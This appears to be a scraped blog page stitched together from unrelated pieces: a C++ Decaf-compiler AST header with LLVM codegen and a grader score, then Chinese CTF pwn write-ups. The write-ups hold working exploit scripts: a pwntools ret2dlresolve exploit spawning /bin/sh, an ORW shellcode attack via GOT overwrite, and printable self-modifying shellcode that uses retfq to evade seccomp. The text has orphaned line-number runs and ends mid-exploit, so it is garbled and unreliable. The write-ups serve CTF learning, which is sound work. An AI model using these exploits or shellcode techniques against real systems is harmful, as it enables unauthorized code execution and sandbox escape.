313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
#include "default-defs.h"
#include <list>
#include <ostream>
#include <iostream>
#include <sstream>
#include <map>
#include <regex>

#ifndef YYTOKENTYPE
#include "decafexpr.tab.h"
#endif

using namespace std;
extern llvm::Module *TheModule;

class descriptor {
public:
union
{
llvm::AllocaInst * alloc;
llvm::Function* func;
llvm::Value* value;
llvm::Type* type;
};
llvmValue kind;
};

// decafAST - Base class for all abstract syntax tree nodes.
class decafAST {
public:
descriptor des = {0,nullK};
virtual ~decafAST() {}
virtual string str() { return string(""); }
llvm::Value *Codegen(){
return des.value;
};
};

llvm::Type *getLLVMType(llvmType ty, llvm::LLVMContext &Context ) {
switch (ty) {
case voidTy: return llvm::Type::getVoidTy(Context);
case intTy: return llvm::Type::getInt32Ty(Context);
case boolTy: return llvm::Type::getInt1Ty(Context);
case stringTy: return llvm::Type::getInt8PtrTy(Context);
default: throw runtime_error("unknown type");
}
}

template <class T>
llvm::Value *listCodegen(list<T> vec) {
llvm::Value *val = NULL;
for (typename list<T>::iterator i = vec.begin(); i != vec.end(); i++) {
llvm::Value *j = (*i)->Codegen();
if (j != NULL) { val = j; }
}
return val;
}

string getString(decafAST *d) {
if (d != NULL) {
return d->str();
} else {
return string("None");
}
}

template <class T>
string commaList(list<T> vec) {
string s("");
for (typename list<T>::iterator i = vec.begin(); i != vec.end(); i++) {
s = s + (s.empty() ? string("") : string(",")) + (*i)->str();
}
if (s.empty()) {
s = string("None");
}
return s;
}

// decafStmtList - List of Decaf statements
class decafStmtList : public decafAST {
list<decafAST *> stmts;
public:
decafStmtList() {}
~decafStmtList() {
for (list<decafAST *>::iterator i = stmts.begin(); i != stmts.end(); i++) {
delete *i;
}
}
int size() { return stmts.size(); }
void push_front(decafAST *e) { stmts.push_front(e); }
void push_back(decafAST *e) { stmts.push_back(e); }
list<decafAST *> get_para(){return stmts; }
string str() { return commaList<class decafAST *>(stmts); }
llvm::Value * Codegen() {
return listCodegen<decafAST *>(stmts);
}
};

class decafAllexp : public decafAST {
string Kind;
string Name;
public:
string get_name(){return this->Name; }
string get_kind(){return this->Kind; }
decafAllexp(){}
decafAllexp(string name,string kind) : Name(name),Kind(kind){
this->des.kind = valueK;
map<string,int> tab = {
{"'\\t'",'\t'},
{"'\\r'",'\r'},
{"'\\n'",'\n'},
{"'\\a'",'\a'},
{"'\\v'",'\v'},
{"'\\b'",'\b'},
{"'\\f'",'\f'},
{"'\\\\'",'\\'},
{"'\\\''",'\''},
{"'\\\"'",'\"'},
};
if( kind == "NumberExpr"){
if(tab.count(this->Name)){
this->Name = to_string(tab[this->Name]);
}
else if(this->Name.size() == 1){
this->Name = to_string(Name[0]-48);
}
else if(this->Name.size() == 3 && ( this->Name[0]=='\'' || this->Name[0]=='\"' )){
this->Name = to_string(Name[1]);
}
}
if( kind == "StringConstant"){
string s = this->get_name().erase(0,1);
s.pop_back();
for(int i=0;i<s.length();i++){
if(s[i] == '\\'){
char t[0x8];
sprintf(t,"'\\%c'",s[i+1]);
s[i+1] = tab[t];
for(int j=i;j<s.length()-1;j++){
s[j] = s[j+1];
}
s.pop_back();
}
}
this->Name = s;
}
}
string str() { return Kind + "(" + Name + ")"; }
llvm::Value *Codegen();
};

class decafArrexp : public decafAllexp {
string Name;
decafAllexp * Exp;
public:
decafArrexp(string Name, decafAllexp *Exp)
: Name(Name), Exp(Exp) {}
string str() { return string("ArrayLocExpr") + "(" + Name + "," + getString(Exp) + ")"; }
};

class decafBinexp : public decafAllexp {
public:
string Option;
decafBinexp * Exp1;
decafBinexp * Exp2;
decafBinexp(){}
decafBinexp(string op, decafBinexp *exp1, decafBinexp *exp2)
: Option(op), Exp1(exp1), Exp2(exp2) {
this->des.kind = expbK;
}
virtual int get_op(string Option);
string str() { return string("BinaryExpr") + "(" + Option + "," + getString(Exp1) + "," + getString(Exp2) + ")"; }
llvm::Value *Codegen();
};

int decafBinexp::get_op(string Option){
if(Option == "Plus")
return addtmp;
else if(Option == "Minus")
return subtmp;
else if(Option == "Mult")
return multmp;
else if(Option == "UnaryMinus")
return negtmp;
else if(Option == "Div")
return divtmp;
else if(Option == "Mod")
return remtmp;
else if(Option == "Or")
return ortmp;
else if(Option == "And")
return andtmp;
else if(Option == "Eq")
return eqtmp;
else if(Option == "Neq")
return netmp;
else if(Option == "Not")
return nottmp;
else if(Option == "Lt")
return slttmp;
else if(Option == "Gt")
return sgttmp;
else if(Option == "Leq")
return sletmp;
else if(Option == "Geq")
return sgetmp;
else if(Option == "Leftshift")
return shltmp;
else if(Option == "Rightshift")
return shrtmp;
else
return 0;
}

class decafUnaryexp : public decafBinexp {
public:
decafUnaryexp(){}
decafUnaryexp(string op, decafBinexp *exp1){
decafBinexp::Option = op;
decafBinexp::Exp1 = exp1;
decafBinexp::Exp2 = NULL;
this->des.kind = expuK;
}
string str() {
return string("UnaryExpr") + "(" + Option + "," + getString(Exp1) + ")";
}
};

class decafType : public decafAST {
string Type;
string Name;
public:
llvm::Type* lType;
llvmType Ty;
string get_type(){return this->Type; }
string get_name(){return this->Name; }
void put_name(string Name){ this->Name = Name;}
decafType(string Type){this->Type = Type;}
string str() {
if(Name != ""){
return "VarDef("+Name+","+Type+")";
}
else{
return "VarDef("+Type+")";
}
}
llvm::Value *Codegen();
};

class decafVar : public decafAST {
string Type;
string Name;
string Kind;
decafAllexp* Exp;
decafAllexp* Arr;
public:
llvm::AllocaInst *Alloca;
llvm::Type* lType;
decafVar(string Name) {this->Name = Name;}
string get_type(){return this->Type;}
string get_name(){return this->Name;}
string get_kind(){return this->Kind;}
decafAllexp* get_arr(){return this->Arr;}
decafAllexp* get_exp(){return this->Exp;}
void put_type(decafType* type){
this->Type = type->get_type();
this->lType = type->lType;
}
void put_name(string Name){this->Name = Name;}
void put_kind(string Kind){
if(this->Kind == "")
this->Kind = Kind;
}
void put_arr(decafAllexp* Arr){this->Arr = Arr;}
void put_exp(decafAllexp* Exp){this->Exp = Exp;}
string str() {
if(Exp != NULL){
return "AssignGlobalVar("+Name+","+Type+","+getString(Exp)+")";
}
else if(Kind != "" && Name != ""){
return "FieldDecl("+Name+","+Type+","+Kind+")";
}
else if(Name != ""){
return "VarDef("+Name+","+Type+")";
}
else{
return "VarDef("+Type+")";
}
}
llvm::Value *Codegen();
};

class decafVarList : public decafAST {
list<decafVar*> List;
public:
list<decafVar*> get_list(){return this->List; }
int size() { return List.size(); }
void push_front(decafVar *e) { List.push_front(e); }
void push_back(decafVar *e) { List.push_back(e); }
void cat_front(decafVarList* List) {
list<decafVar*> l = List->get_list();
for(auto e:l){
this->List.push_front(e);
}
}
void put_types(decafType* Type){
for(auto e:this->List){
e->put_type(Type);
}
}
void put_kinds(string Kind){
for(auto e:this->List){
e->put_kind(Kind);
}
}
string str() {return commaList<class decafVar *>(List);}
llvm::Value * Codegen() {
return listCodegen<decafVar *>(List);
}
};

class decafOutput : public decafAST {
string Data;
public:
decafOutput(string Data){this->Data = Data;}
string str() { return Data; }
};

class decafPara : public decafAST {
list<decafType *> Para;
public:
int size() { return Para.size(); }
void push_front(decafType *e) { Para.push_front(e); }
void push_back(decafType *e) { Para.push_back(e); }
list<decafType *> get_para(){return Para; }
string str() { return commaList<class decafType *>(Para); }
llvm::Value *Codegen();
};

class decafStmt : public decafAST {
public:
llvmStmt kind;
decafStmt(){}
llvm::Value * Codegen();
};

class decafStmts : public decafAST {
list<decafStmt *> stmts;
public:
decafStmts() {}
int size() { return stmts.size(); }
void push_front(decafStmt *e) { stmts.push_front(e); }
void push_back(decafStmt *e) { stmts.push_back(e); }
list<decafStmt *> get_para(){return stmts; }
string str() { return commaList<class decafStmt *>(stmts); }
llvm::Value * Codegen() {
llvm::Value* v = listCodegen<decafStmt *>(stmts);
return v;
}
};

class decafFunCall : public decafStmt {
string Name;
list<decafAST *> Para;
public:
decafFunCall(){
this->kind = dcall;
this->des.kind = funcK;
}
void put_para(list<decafAST *> Para){ this->Para = Para; }
void put_name(string *Name){ this->Name = *Name; }
int size() { return Para.size(); }
string get_name(){ return this->Name; }
list<decafAST *> get_para(){ return this->Para; }
string str() {
return string("MethodCall") + "(" + Name + "," + commaList<class decafAST *>(Para) + ")";
}
llvm::Value *Codegen();
};

class decafAssign : public decafStmt {
string Var;
bool key;
decafAllexp* Arr;
decafBinexp* Exp;
public:
void put_arr(decafAllexp* Arr){this->Arr = Arr;}
void put_key(bool key){this->key = key;}
string get_var(){ return this->Var; }
decafBinexp* get_exp(){ return this->Exp; }
decafAssign(string Var, decafBinexp* Exp):Var(Var),Exp(Exp){}
string str() {
if(Arr == NULL)
return string("AssignVar") + "(" + Var + "," + getString(Exp) + ")";
else
return string("AssignArrayLoc") + "(" + Var + "," + getString(Arr)+","+ getString(Exp) + ")";
}
llvm::Value *Codegen();
};

class decafAssignList : public decafAST {
list<decafAssign *>List;
public:
int size() { return List.size(); }
void push_front(decafAssign *e) { List.push_front(e); }
void push_back(decafAssign *e) { List.push_back(e); }
void put_keys(bool key){
for(auto ass:List){
ass->put_key(key);
}
}
string str() {
return commaList<class decafAssign *>(List);
}
llvm::Value *Codegen() {
return listCodegen<decafAssign *>(List);
}
};

class decafBlock : public decafStmt {
string BloKind;
decafVarList *FieldDeclList;
decafStmts *StateDeclList;
public:
decafBlock(string blokind,decafVarList *fieldlist, decafStmts *methodlist)
: BloKind(blokind), FieldDeclList(fieldlist), StateDeclList(methodlist) { this->kind = dblo; }
~decafBlock() {
if (FieldDeclList != NULL) { delete FieldDeclList; }
if (StateDeclList != NULL) { delete StateDeclList; }
}
string str() {
return BloKind + "(" + getString(FieldDeclList) + "," + getString(StateDeclList) + ")";
}
llvm::Value *Codegen();
};

class decafFuncDef : public decafAST {
string Name;
string Type;
decafPara * Para;
decafBlock * Block;
public:
llvm::Type *lType;
llvm::Function *lfunc;
void put_para(decafPara * Para){ this->Para = Para;}
void put_name(string *Name){ this->Name = *Name; }
void put_type(decafType* type){
this->Type = type->get_type();
this->lType = type->lType;
}
void put_block(decafBlock *Block){ this->Block = Block; }
decafBlock *get_block(){ return this->Block; }
decafPara *get_para(){ return this->Para; }
string get_name(){ return this->Name; }
string str() {
return string("Method") + "(" + Name + "," + Type + "," + getString(Para) + "," + getString(Block) + ")";
}
llvm::Value *Codegen();
};

class decafFuncDefList : public decafAST {
list<decafFuncDef*> List;
public:
list<decafFuncDef*> get_list(){return this->List; }
int size() { return List.size(); }
void push_front(decafFuncDef *e) { List.push_front(e); }
void push_back(decafFuncDef *e) { List.push_back(e); }
void cat_front(decafFuncDefList* List) {
list<decafFuncDef*> l = List->get_list();
for(auto e:l){
this->List.push_front(e);
}
}
void put_types(decafType* Type){
for(auto e:this->List){
e->put_type(Type);
}
}
string str() {return commaList<class decafFuncDef *>(List);}
llvm::Value *Codegen() {
return listCodegen<decafFuncDef *>(List);
}
};

class decafEXFuncDef : public decafAST {
string Name;
string Type;
decafPara* Para;
public:
llvm::Type *lType;
llvm::Function *lfunc;
void put_para(decafPara* Para){ this->Para = Para;}
void put_name(string *Name){ this->Name = *Name; }
void put_type(decafType* type){
this->Type = type->get_type();
this->lType = type->lType;
}
string get_name(){return this->Name; }
string get_type(){return this->Type; }
decafPara* get_para(){ return this->Para; }
string str() {
return string("ExternFunction") + "(" + Name + "," + Type + "," + getString(Para) + ")";
}
llvm::Value *Codegen();
};

class decafEXFuncDefList : public decafAST {
list<decafEXFuncDef*> List;
public:
list<decafEXFuncDef*> get_list(){return this->List; }
int size() { return List.size(); }
void push_front(decafEXFuncDef *e) { List.push_front(e); }
void push_back(decafEXFuncDef *e) { List.push_back(e); }
void cat_front(decafEXFuncDefList* List) {
list<decafEXFuncDef*> l = List->get_list();
for(auto e:l){
this->List.push_front(e);
}
}
void put_types(decafType* Type){
for(auto e:this->List){
e->put_type(Type);
}
}
string str() {return commaList<class decafEXFuncDef *>(List);}
llvm::Value *Codegen() {
return listCodegen<decafEXFuncDef *>(List);
}
};

class PackageAST : public decafAST {
string Name;
decafVarList *FieldDeclList;
decafFuncDefList *MethodDeclList;
public:
PackageAST(string name, decafVarList *fieldlist, decafFuncDefList *methodlist)
: Name(name), FieldDeclList(fieldlist), MethodDeclList(methodlist) {}
~PackageAST() {
if (FieldDeclList != NULL) { delete FieldDeclList; }
if (MethodDeclList != NULL) { delete MethodDeclList; }
}
string str() {
return string("Package") + "(" + Name + "," + getString(FieldDeclList) + "," + getString(MethodDeclList) + ")";
}
llvm::Value *Codegen() {
llvm::Value *val = NULL;
TheModule->setModuleIdentifier(llvm::StringRef(Name));
if (NULL != FieldDeclList) {
val = FieldDeclList->Codegen();
}
if (NULL != MethodDeclList) {
val = MethodDeclList->Codegen();
}
// Q: should we enter the class name into the symbol table?
return val;
}
};

class decafIF : public decafStmt {
decafAllexp * Exp;
decafBlock * Block;
decafBlock * Block2;
public:
decafIF(decafAllexp * Exp,decafBlock * Block,decafBlock * Block2): Exp(Exp),Block(Block),Block2(Block2){}
string str() {
return string("IfStmt") + "(" + getString(Exp) +"," + getString(Block) + "," + getString(Block2) + ")";
}
llvm::Value *Codegen();
};

class decafWhile : public decafStmt {
decafAllexp * Exp;
decafBlock * Block;
public:
decafWhile(decafAllexp * Exp,decafBlock * Block): Exp(Exp),Block(Block){}
string str() {
return string("WhileStmt") + "(" + getString(Exp) +"," + getString(Block) + ")";
}
llvm::Value *Codegen();
};

class decafFor : public decafStmt {
decafAllexp * Exp;
decafBlock * Block;
decafAssignList *List;
decafAssignList *List2;
public:
decafFor(decafAllexp * Exp,decafBlock * Block,decafAssignList *List,decafAssignList *List2): Exp(Exp),Block(Block),List(List),List2(List2){}
string str() {
return string("ForStmt") + "(" + getString(List)+","+getString(Exp) +","+getString(List2)+","+getString(Block) + ")";
}
llvm::Value *Codegen();
};

class decafReturn : public decafStmt {
decafBinexp * Exp;
public:
decafReturn(){
this->kind = dret;
}
decafReturn(decafBinexp * Exp){
this->Exp = Exp;
this->kind = dret;
}
decafBinexp* get_exp(){ return this->Exp; }
string str() { return string("ReturnStmt") + "(" + getString(Exp) + ")"; }
llvm::Value *Codegen();
};

// ProgramAST - the decaf program
class ProgramAST : public decafAST {
decafEXFuncDefList *ExternList;
PackageAST *PackageDef;
public:
ProgramAST(decafEXFuncDefList *externs, PackageAST *c) : ExternList(externs), PackageDef(c) {}
~ProgramAST() {
if (ExternList != NULL) { delete ExternList; }
if (PackageDef != NULL) { delete PackageDef; }
}
string str() { return string("Program") + "(" + getString(ExternList) + "," + getString(PackageDef) + ")"; }
llvm::Value *Codegen() {
llvm::Value *val = NULL;
if (NULL != ExternList) {
val = ExternList->Codegen();
}
if (NULL != PackageDef) {
val = PackageDef->Codegen();
} else {
throw runtime_error("no package definition in decaf program");
}
return val;
}
};

最终拿到了满分:

1
2
3
Correct(dev): 100 / 100
Score(dev): 100.00
Total Score: 100.00

no_output

1
2
3
4
5
6
test: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=42055570bc1508252eacc21b95b83f8c002483eb, for GNU/Linux 3.2.0, stripped
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
  • 32位,dynamically,NX

漏洞分析

简单栈溢出

1
2
3
4
5
6
ssize_t read_s()
{
char buf[68]; // [esp+0h] [ebp-48h] BYREF

return read(0, buf, 0x100u); // 栈溢出
}

strcpy 会将字符串末尾置空,导致 fdg 被设置为“0”

1
strcpy(nameg, name);

入侵思路

利用 strcpy 的溢出覆盖 fdg 为“0”,通过第二次输入绕过程序的字符串匹配检查

接着就要考虑如何触发浮点异常信号 SIGFPE:

1
2
3
4
5
6
7
8
9
10
v2 = "give me the soul:";
__isoc99_scanf("%d", soul);
v2 = "give me the egg:";
__isoc99_scanf("%d", &egg);
if ( egg )
{
signal(8, (__sighandler_t)read_s);
soul[1] = soul[0] / egg;
signal(8, 0);
}

由于除号两边都是 int 类型,因此 -0x80000000/-1 就会触发漏洞(-0x80000000/-1 的计算结果为 0x80000000,其值为负数,导致符号位溢出)

由于没法泄露,因此只能打 ret2dlresolve

对于32位无 PIE 保护的程序,在 pwntools 中有比较成熟的 ret2dlresolve 工具,直接拿来用就好了

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
# -*- coding:utf-8 -*-
from signal import pause
from pwn import *

arch = 32
challenge = './test'

context.os='linux'
context.log_level = 'debug'

if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')
context.binary = elf

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

local = 1
if local:
p = process(challenge)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p)
gdb.attach(p,"b* 0x8049268")
pause()

def cmd(op):
sla(">",str(op))

#debug()
sl("\x00")
sleep(0.2)
p.send("a"*0x20)
sleep(0.2)
sl("hello_boy")
sleep(0.2)
sl("-2147483648")
sleep(0.2)
sl("-1")
sleep(0.2)

bss_addr = 0x804C080+0x200
rop = ROP(context.binary)
dlresolve = Ret2dlresolvePayload(elf,symbol="system",args=["/bin/sh"])

rop.read(0,dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)
print(rop.dump())

raw_rop = rop.chain()
sl(flat([{76:raw_rop}]))
sl(dlresolve.payload)

p.interactive()

orw

1
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu11.3) stable release version 2.23, by Roland McGrath et al.
1
2
3
4
5
6
7
pwn: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=02a3c09af5900983d07486d2b3310dffcebfde86, stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX disabled
PIE: PIE enabled
RWX: Has RWX segments
  • 64位,dynamically,Partial RELRO,Canary,PIE
1
2
3
4
5
6
7
8
9
10
11
12
13
 line  CODE  JT   JF      K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x08 0xc000003e if (A != ARCH_X86_64) goto 0010
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x05 0xffffffff if (A != 0xffffffff) goto 0010
0005: 0x15 0x03 0x00 0x00000000 if (A == read) goto 0009
0006: 0x15 0x02 0x00 0x00000001 if (A == write) goto 0009
0007: 0x15 0x01 0x00 0x00000002 if (A == open) goto 0009
0008: 0x15 0x00 0x01 0x0000003c if (A != exit) goto 0010
0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0010: 0x06 0x00 0x00 0x00000000 return KILL
  • 白名单,只能打 ORW

漏洞分析

index 缺乏检查,导致 chunk_list 可以向上溢出:

1
2
3
4
5
6
chunk_list[index] = malloc(size);
if ( !chunk_list[index] )
{
puts("error");
exit(0);
}

入侵思路

程序的限制比较多:

  • add 可以执行2次,dele 可以执行1次
  • 每次输入的 size 大小不超过8字节,index 大小不超过1(可以为负数)

由于 index 可以为负数,可以尝试向上溢出,能够劫持的地方只有两处:GOT,IO_FILE

1
2
98:04c0│  0x564531002060 (malloc@got.plt) —▸ 0x7fa488599180 (malloc) ◂— push   rbp
99:04c8│ 0x564531002068 (setvbuf@got.plt) —▸ 0x7fa488584e80 (setvbuf) ◂— push rbp
1
2
a2:05100x5645310020b0 —▸ 0x7fa4888d98e0 (_IO_2_1_stdin_) ◂— 0xfbad208b
a3:05180x5645310020b8 ◂— 0x0

往 GOT 写入堆地址似乎没有什么用,劫持 IO_FILE 的话输入的字节数又太少

后来突然意识到一点:写入 GOT 的堆中数据可能会被执行(没有 NX),有些 wp 上也是利用这一点进行入侵

但经测试发现这些数据没有执行权限,vmmap 打印的 heap 段也没有显示x权限

1
2
3
pwndbg> vmmap 0x555555605160
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x555555605000 0x555555626000 rw-p 21000 0 [heap] +0x160

一番查找后得知:某些旧版本的操作系统可能不支持或不启用NX位,在这种情况下,即使关闭了NX位,堆仍然不会具有执行权限

接下来的思路就简单了,往 GOT 写入并执行8字节的指令,共有2次机会

其中最适合写指令的 GOT 表条目就是 atoi got

1
2
readn(nptr, 16LL);
return atoi(nptr);
1
2
0x555555400e29    call   atoi@plt                <atoi@plt>
nptr: 0x7fffffffdc20 ◂— 0x31 /* '1' */

因为栈也是有执行权限的,如果在 atoi got 中写入 jmp rdi 就可以劫持控制流到栈上,然后执行一个 sys_read 就可以写入 ORW 的 shellcode

由于 heap 权限的问题没有解决,我这里只能参考网上的 exp 大概写一下

非完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.23.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

c = "set exec-wrapper env 'LD_PRELOAD=./libc-2.23.so'\nrun\nb *$rebase(0xE29)\n"
local = 1
if local:
#p = process(challenge)
p = gdb.debug(challenge,c)
else:
p = remote('119.13.105.35','10111')

def debug():
#gdb.attach(p)
gdb.attach(p,c)
pause()

def cmd(op):
sla(">>",str(op))

def add(index,size,data):
cmd(1)
if(type(index) == int):
sla("index:",str(index))
else:
sla("index:",index)
sla("size:",str(size))
sla("content:",data)

def dele(index):
cmd(4)
if(type(index) == int):
sla("index:",str(index))
else:
sla("index:",index)

add("-14",0x8,asm("jmp rdi"))

shellcode_open = shellcraft.pushstr("flag") + shellcraft.open("rsp")
shellcode_read = shellcraft.read("rax","rsp",60)
shellcode_write = shellcraft.write(1,"rsp",60)
print(len(shellcode_open))
print(len(shellcode_read))
print(len(shellcode_write))

shellcode_magic = asm("xor rax,rax;mov dl,0x80;mov rsi,rbp;push rax;pop rdi;syscall;jmp rbp")
cmd(shellcode_magic)

p.send(asm(shellcode_open+shellcode_read+shellcode_write))

p.interactive()

shellcode

1
2
3
4
5
6
shellcode: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
  • 64位,dynamically,NX
1
2
3
4
5
6
7
8
9
0000: 0x20 0x00 0x00 0x00000000  A = sys_number
0001: 0x15 0x06 0x00 0x00000005 if (A == fstat) goto 0008
0002: 0x15 0x05 0x00 0x00000025 if (A == alarm) goto 0008
0003: 0x15 0x03 0x00 0x00000004 if (A == stat) goto 0007
0004: 0x15 0x03 0x00 0x00000000 if (A == read) goto 0008
0005: 0x15 0x02 0x00 0x00000009 if (A == mmap) goto 0008
0006: 0x15 0x01 0x00 0x000000e7 if (A == exit_group) goto 0008
0007: 0x06 0x00 0x00 0x00000000 return KILL
0008: 0x06 0x00 0x00 0x7fff0000 return ALLOW
  • 白名单,要考虑 retfq 切换32位架构绕过 seccomp

漏洞分析

直接执行 shellcode:

1
2
3
4
5
6
7
8
9
10
11
12
13
size = sys_read(0, shellcode, 0x1000uLL);
size2 = size;
if ( shellcode[(int)size - 1] == 0xA )
{
shellcode[(int)size - 1] = 0;
size2 = size - 1;
}
for ( i = 0; i < size2; ++i )
{
if ( shellcode[i] <= 0x1F || shellcode[i] == 0x7F )
goto LABEL_10;
}
((void (*)(void))shellcode)();
  • 现在 shellcode 的范围为 (0x1f,0x7f)

入侵思路

程序对输入的 shellcode 有检查,建议用 nasm 手动编写 shellcode

可以利用 shellcode 创造一个 sys_read 绕过 shellcode 的检查,但在实际构造的过程中遇到了很多问题,最大的问题但就是无法使用 syscall(类似于 mov,add 之类的指令也会被过滤掉)

后来调试网上的 wp 发现了解决的办法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
append = '''
push rdx
pop rdx
'''

shellcode_read = '''
/*read(0,0x40404040,0x70)*/
push 0x40404040
pop rsi
push 0x40
pop rax
xor al,0x40
push rax
pop rdi
xor al,0x40
push 0x70
pop rdx
push rbx
pop rax
push 0x5d
pop rcx
xor byte ptr[rax+0x57],cl
push 0x5f
pop rcx
xor byte ptr[rax+0x58],cl
push rdx
pop rax
xor al,0x70
'''

shellcode = ""
shellcode += shellcode_read
shellcode += append
shellcode = asm(shellcode,arch = 'amd64',os = 'linux')
  • 直接输入 syscall 会被检测出来,但通过 xor byte ptr[rax+offset],cl 就可以将后面的二进制代码给计算为 syscall
  • 对于这种会检查 shellcode 的程序来说,破解的关键点就是要利用合适的汇编指令来修改 shellcode 本身

利用这个技巧可以获取到 syscall,但由于程序没法泄露,因此先执行 sys_mmap 申请一段固定位置的缓冲区,然后执行 sys_read 将数据写入其中:

1
2
3
4
5
6
7
0x7f6fba0ee031    syscall  <SYS_mmap>
addr: 0x40404040
len: 0x7e
prot: 0x7
flags: 0x22
fd: 0x0 (pipe:[270462])
offset: 0x0
1
2
3
4
0x7f6fba0ee057    syscall  <SYS_read>
fd: 0x0 (pipe:[270462])
buf: 0x40404040 ◂— 0
nbytes: 0x70

最后的步骤就是 retfq 切换32位架构来绕过 seccomp 了

  • 指令 retfq 有两步操作:pop ip,pop cs(retf 是32位的 pop,retfq 是64位的 pop)
    • cs=0x23 程序以32位模式运行
    • cs=0x33 程序以64位模式运行

只要按照如下方法步骤 shellcode 就可以完成切换:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
shellcode_retfq = '''
push rbx
pop rax

xor al,0x40
push 0x72
pop rcx
xor byte ptr[rax+0x40],cl
push 0x68
pop rcx
xor byte ptr[rax+0x40],cl
push 0x47
pop rcx
sub byte ptr[rax+0x41],cl
push 0x48
pop rcx
sub byte ptr[rax+0x41],cl
push rdi
push rdi
push 0x23
push 0x40404040
pop rax
push rax
'''
  • 正常写入的 retfq 指令会被程序过滤,但还是可以通过 sub byte ptr[rax+offset],cl 进行调整

在绕过 seccomp 后还是会因为没有 wrire 而打印不出 flag,因此只能通过 cmp 汇编指令来区别内存中的 flag,将 flag 爆破出来(类似于 SCTF-gadget 的思路)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
